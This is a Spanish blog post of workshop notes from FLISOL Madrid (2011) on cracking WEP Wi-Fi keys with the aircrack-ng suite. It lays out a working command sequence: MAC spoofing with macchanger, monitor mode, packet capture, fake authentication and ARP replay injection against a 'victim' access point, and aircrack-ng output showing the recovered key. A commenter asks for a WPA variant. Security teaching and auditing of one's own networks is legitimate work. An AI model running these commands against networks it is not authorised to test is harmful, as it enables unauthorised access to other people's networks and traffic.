Buscar este blog

domingo, 17 de abril de 2011

Apuntes TALLER aircrack-ng ofrecido en el FLISOL Madrid

TALLER aircrack-ng 
 
---- ifconfig (para averiguar la propia MAC)aparece como:direcciónHW 00:13 …
 
 
---- macchanger cambia mac (de ser necesario por propia seguridad)
mi mac 00:1a:1a:01:5a:da

macchanger -m 00:11:22:33:44:55 wlan0

sudo macchanger --s wlan1

Current MAC: 00:22:57:97:ef:1c---- crear la interfaz mon0 Airmon-ng. 
Aviso: Las direcciones mac SIEMPRE deben iniciar con 00

Airmon-ng es parte de la suite de aircrack-ng la cual permite crear la interfaz mon0
en modo monitor. Su utilización es la siguiente:
# airmon-ng start wlan0 (o el nombre de la interfaz que puede ser wlan0, eth1, etc)

sudo airmon-ng start wlan2

Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)---- crea archivos (con o sin filtro)

sudo airodump-ng mon0  (se selecciona el canal que se quiere escuchar … por ejemplo 12)

airodump-ng -c 12 -w (nombre_de_archivo) mon0 
 
 
otra posibilidad:
 
 
(utilizado con el KISMET en lugar del airodump bueno tambien funciona bien) 
 
---- aireplay-ng (ataque -1 pedido de autenticacion con AP)

aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID victima) -a (Mac Victima) -h (MAC propia) mon0

sudo aireplay-ng -1 6000 -q 10 -o 1 -e WLAN_88 -a 00:13:49:E5:E6:3C -h 00:1D:1A:00:5A:CC mon0
---- aireplay-ng (ataque -3)

aireplay-ng -3 -b (Mac Víctima) -h (nuestra mac) mon0


sudo aireplay-ng -3 -b 00:23:F8:90:E7:1B -h 00:1e:58:97:ef:1d mon0
---- aircrack-ng
aircrack-ng *.cap

sudo aircrack-ng *.cap

 Aircrack-ng 1.0

                 [00:40:03] Tested 785 keys (got 45395 IVs)

   KB    depth   byte(vote)
    0    2/  3   3A(54528) 2F(53248) D1(53248) 05(52736) 6B(52736) 
  

     KEY FOUND! [ 5A:30:30:30:32:43:46:34:39:37:45:38:31 ] (ASCII: Z0002CF497E81 )
 Decrypted correctly: 100%




FLISOL MADRID (Auspicia Linuxeros Softiternity) Taller a cargo de Curro Linuxero

2 comentarios:

  1. Y un ejemplo con redes y encriptación wpa, sin el uso del diccionario?

    ResponderEliminar